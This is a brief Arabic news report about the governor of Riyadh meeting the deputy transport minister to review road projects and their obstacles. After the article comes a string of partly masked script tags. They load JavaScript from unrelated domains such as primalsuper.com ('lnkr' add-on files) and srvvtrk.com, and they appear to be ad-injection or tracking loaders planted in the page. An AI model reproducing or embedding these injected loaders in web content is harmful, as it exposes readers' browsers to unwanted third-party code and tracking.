شكرا لقرائتكم خبر عن أمير الرياض يناقش معوقات الطرق مع نائب وزير النقل والان نبدء بالتفاصيل

استقبل الأمير فيصل بن بندر بن عبدالعزيز أمير منطقة الرياض، في مكتبه أمس نائب وزير النقل لشؤون الطرق المهندس بدر الدلامي، يرافقه مدير عام فرع وزارة النقل بمنطقة الرياض المهندس سلمان الضلعان.

واستعرض المهندس الدلامي سير عمل مشروعات الطرق في منطقة الرياض وآخر التطورات الفنية والتقنية، فيما بحث سمو أمير الرياض أبرز المعوقات والحلول المطروحة لعدد من المشروعات وسبل تنفيذها وإنجازها، وأشار نائب وزير النقل إلى أن بعض المشروعات جاري العمل على تحسينها وبذل الجهود وتنفيذ توجيهات سمو أمير منطقة الرياض وسمو نائبه ومتابعتهم المباشرة. حضر الاستقبال وكيل إمارة منطقة الرياض الدكتور فيصل السديري، ووكيل الإمارة المساعد للشؤون التنموية المكلف سعود العريفي، وأمين عام مجلس المنطقة المكلف عادل الحمدان ******** async="" src="//1046663444.rsc.cdn77.org/1fd3b038f796d0b159.js">******** ******** src="//1018433480.rsc.cdn77.org/1fd3b038f796d0b159.js">******** ******** src="https://primalsuper.com/optout/set/lat?jsonp=__twb_cb_314594629&key=1fd3b038f796d0b159&cv=1549548893&t=1549548893652" type="text/javascript">******** ******** src="https://primalsuper.com/optout/set/lt?jsonp=__twb_cb_313647927&key=1fd3b038f796d0b159&cv=23778&t=1549548893652" type="text/javascript">******** ******** src="https://primalsuper.com/addons/lnkr5.min.js" type="text/javascript">******** ******** src="https://srvvtrk.com/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51968x8147x&r=1549548893656" type="text/javascript">******** ******** src="https://primalsuper.com/addons/lnkr30_nt.min.js" type="text/javascript">********